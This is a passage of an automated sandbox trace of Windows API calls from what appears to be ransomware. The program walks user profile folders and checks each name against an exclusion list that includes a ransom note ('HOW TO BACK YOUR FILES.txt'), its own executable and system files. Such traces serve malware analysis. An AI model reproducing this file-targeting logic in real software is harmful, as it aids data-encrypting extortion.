(lpString1="MMC", lpString2="bootmgr") returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="pagefile.sys") returned -1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="boot") returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="ids.txt") returned 1 [0051.871] lstrcmpiW (lpString1="MMC", lpString2="NTUSER.DAT") returned -1 [0051.871] lstrcpyW (in: lpString1=0x30aeafc, lpString2="MMC" | out: lpString1="MMC") returned="MMC" [0051.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0051.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5c) returned 0xc7a2e8 [0051.872] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66628 | out: ListHead=0xc66828, ListEntry=0xc66628) returned 0xc66328 [0051.872] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS Project", cAlternateFileName="MSPROJ~1")) returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="Tiger4444.exe") returned -1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2=".") returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="..") returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="windows") returned -1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="bootmgr") returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="pagefile.sys") returned -1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="boot") returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="ids.txt") returned 1 [0051.872] lstrcmpiW (lpString1="MS Project", lpString2="NTUSER.DAT") returned -1 [0051.872] lstrcpyW (in: lpString1=0x30aeafc, lpString2="MS Project" | out: lpString1="MS Project") returned="MS Project" [0051.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0051.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc89d10 [0051.872] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66628 [0051.872] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab3fa09c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab3fa09c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="Tiger4444.exe") returned -1 [0051.872] lstrcmpiW (lpString1="Network", lpString2=".") returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="..") returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="windows") returned -1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="bootmgr") returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="pagefile.sys") returned -1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="boot") returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="ids.txt") returned 1 [0051.872] lstrcmpiW (lpString1="Network", lpString2="NTUSER.DAT") returned -1 [0051.872] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Network" | out: lpString1="Network") returned="Network" [0051.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0051.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x64) returned 0xc7a350 [0051.872] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc66668 [0051.872] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15925c1b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15925c1b, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0051.872] lstrcmpiW (lpString1="Office", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.872] lstrcmpiW (lpString1="Office", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.872] lstrcmpiW (lpString1="Office", lpString2="Tiger4444.exe") returned -1 [0051.872] lstrcmpiW (lpString1="Office", lpString2=".") returned 1 [0051.872] lstrcmpiW (lpString1="Office", lpString2="..") returned 1 [0051.873] lstrcmpiW (lpString1="Office", lpString2="windows") returned -1 [0051.873] lstrcmpiW (lpString1="Office", lpString2="bootmgr") returned 1 [0051.873] lstrcmpiW (lpString1="Office", lpString2="pagefile.sys") returned -1 [0051.873] lstrcmpiW (lpString1="Office", lpString2="boot") returned 1 [0051.873] lstrcmpiW (lpString1="Office", lpString2="ids.txt") returned 1 [0051.873] lstrcmpiW (lpString1="Office", lpString2="NTUSER.DAT") returned 1 [0051.873] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Office" | out: lpString1="Office") returned="Office" [0051.873] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91528 [0051.873] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc73f50 [0051.873] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91530 | out: ListHead=0xc66828, ListEntry=0xc91530) returned 0xc66368 [0051.873] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b1656b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa8b1656b, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdd629eb7, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="Tiger4444.exe") returned -1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2=".") returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="..") returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="windows") returned -1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="bootmgr") returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="pagefile.sys") returned -1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="boot") returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="ids.txt") returned 1 [0051.873] lstrcmpiW (lpString1="Outlook", lpString2="NTUSER.DAT") returned 1 [0051.873] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Outlook" | out: lpString1="Outlook") returned="Outlook" [0051.873] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91468 [0051.873] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x64) returned 0xc5f6a8 [0051.873] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91470 | out: ListHead=0xc66828, ListEntry=0xc91470) returned 0xc91530 [0051.873] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b00229f, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1b00229f, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x1b00229f, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPoint", cAlternateFileName="POWERP~1")) returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="Tiger4444.exe") returned -1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2=".") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="..") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="windows") returned -1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="bootmgr") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="pagefile.sys") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="boot") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="ids.txt") returned 1 [0051.873] lstrcmpiW (lpString1="PowerPoint", lpString2="NTUSER.DAT") returned 1 [0051.873] lstrcpyW (in: lpString1=0x30aeafc, lpString2="PowerPoint" | out: lpString1="PowerPoint") returned="PowerPoint" [0051.873] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91388 [0051.873] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc89608 [0051.874] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91390 | out: ListHead=0xc66828, ListEntry=0xc91390) returned 0xc91470 [0051.874] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f58c1c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x6f58c1c, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x6f58c1c, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="Tiger4444.exe") returned -1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2=".") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="..") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="windows") returned -1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="bootmgr") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="pagefile.sys") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="boot") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="ids.txt") returned 1 [0051.874] lstrcmpiW (lpString1="Proof", lpString2="NTUSER.DAT") returned 1 [0051.874] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Proof" | out: lpString1="Proof") returned="Proof" [0051.874] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc915a8 [0051.874] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc73fc0 [0051.874] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc915b0 | out: ListHead=0xc66828, ListEntry=0xc915b0) returned 0xc91390 [0051.874] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b7903de, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b7903de, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="Tiger4444.exe") returned -1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2=".") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="..") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="windows") returned -1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="bootmgr") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="pagefile.sys") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="boot") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="ids.txt") returned 1 [0051.874] lstrcmpiW (lpString1="Protect", lpString2="NTUSER.DAT") returned 1 [0051.874] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Protect" | out: lpString1="Protect") returned="Protect" [0051.874] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91548 [0051.874] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x64) returned 0xc5f718 [0051.874] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91550 | out: ListHead=0xc66828, ListEntry=0xc91550) returned 0xc915b0 [0051.874] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eea37, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x422eea37, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x422eea37, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0051.874] lstrcmpiW (lpString1="Publisher", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.874] lstrcmpiW (lpString1="Publisher", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.874] lstrcmpiW (lpString1="Publisher", lpString2="Tiger4444.exe") returned -1 [0051.874] lstrcmpiW (lpString1="Publisher", lpString2=".") returned 1 [0051.874] lstrcmpiW (lpString1="Publisher", lpString2="..") returned 1 [0051.874] lstrcmpiW (lpString1="Publisher", lpString2="windows") returned -1 [0051.875] lstrcmpiW (lpString1="Publisher", lpString2="bootmgr") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher", lpString2="pagefile.sys") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher", lpString2="boot") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher", lpString2="ids.txt") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher", lpString2="NTUSER.DAT") returned 1 [0051.875] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Publisher" | out: lpString1="Publisher") returned="Publisher" [0051.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc913e8 [0051.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x68) returned 0xc5fd10 [0051.875] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc913f0 | out: ListHead=0xc66828, ListEntry=0xc913f0) returned 0xc91550 [0051.875] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xde511f85, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xde511f85, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publisher Building Blocks", cAlternateFileName="PUBLIS~2")) returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Tiger4444.exe") returned -1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="windows") returned -1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="bootmgr") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="pagefile.sys") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="boot") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="ids.txt") returned 1 [0051.875] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="NTUSER.DAT") returned 1 [0051.875] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Publisher Building Blocks" | out: lpString1="Publisher Building Blocks") returned="Publisher Building Blocks" [0051.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc916a8 [0051.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x88) returned 0xc78e08 [0051.875] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc916b0 | out: ListHead=0xc66828, ListEntry=0xc916b0) returned 0xc913f0 [0051.875] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38fae20, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38fae20, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xd38fae20, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Signatures", cAlternateFileName="SIGNAT~1")) returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="Tiger4444.exe") returned -1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2=".") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="..") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="windows") returned -1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="bootmgr") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="pagefile.sys") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="boot") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="ids.txt") returned 1 [0051.875] lstrcmpiW (lpString1="Signatures", lpString2="NTUSER.DAT") returned 1 [0051.875] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Signatures" | out: lpString1="Signatures") returned="Signatures" [0051.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91488 [0051.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc89ab8 [0051.876] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91490 | out: ListHead=0xc66828, ListEntry=0xc91490) returned 0xc916b0 [0051.876] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Speech", cAlternateFileName="")) returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="Tiger4444.exe") returned -1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2=".") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="..") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="windows") returned -1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="bootmgr") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="pagefile.sys") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="boot") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="ids.txt") returned 1 [0051.876] lstrcmpiW (lpString1="Speech", lpString2="NTUSER.DAT") returned 1 [0051.876] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Speech" | out: lpString1="Speech") returned="Speech" [0051.876] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91568 [0051.876] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc5fd80 [0051.876] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91570 | out: ListHead=0xc66828, ListEntry=0xc91570) returned 0xc91490 [0051.876] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38d4b92, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38d4b92, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xd38d4b92, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="Tiger4444.exe") returned -1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2=".") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="..") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="windows") returned -1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="bootmgr") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="pagefile.sys") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="boot") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="ids.txt") returned 1 [0051.876] lstrcmpiW (lpString1="Stationery", lpString2="NTUSER.DAT") returned 1 [0051.876] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Stationery" | out: lpString1="Stationery") returned="Stationery" [0051.876] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91508 [0051.876] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc89860 [0051.876] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91510 | out: ListHead=0xc66828, ListEntry=0xc91510) returned 0xc91570 [0051.876] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab505145, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab505145, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0051.876] lstrcmpiW (lpString1="SystemCertificates", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.876] lstrcmpiW (lpString1="SystemCertificates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.876] lstrcmpiW (lpString1="SystemCertificates", lpString2="Tiger4444.exe") returned -1 [0051.876] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1 [0051.876] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1 [0051.876] lstrcmpiW (lpString1="SystemCertificates", lpString2="windows") returned -1 [0051.876] lstrcmpiW (lpString1="SystemCertificates", lpString2="bootmgr") returned 1 [0051.877] lstrcmpiW (lpString1="SystemCertificates", lpString2="pagefile.sys") returned 1 [0051.877] lstrcmpiW (lpString1="SystemCertificates", lpString2="boot") returned 1 [0051.877] lstrcmpiW (lpString1="SystemCertificates", lpString2="ids.txt") returned 1 [0051.877] lstrcmpiW (lpString1="SystemCertificates", lpString2="NTUSER.DAT") returned 1 [0051.877] lstrcpyW (in: lpString1=0x30aeafc, lpString2="SystemCertificates" | out: lpString1="SystemCertificates") returned="SystemCertificates" [0051.877] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc914a8 [0051.877] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7a) returned 0xc71bf8 [0051.877] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc914b0 | out: ListHead=0xc66828, ListEntry=0xc914b0) returned 0xc91510 [0051.877] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacdbc5f1, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xe3719c0d, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xf50bbe18, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="Tiger4444.exe") returned -1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0051.877] lstrcmpiW (lpString1="Templates", lpString2="NTUSER.DAT") returned 1 [0051.877] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0051.877] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91608 [0051.877] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x68) returned 0xc61df8 [0051.877] 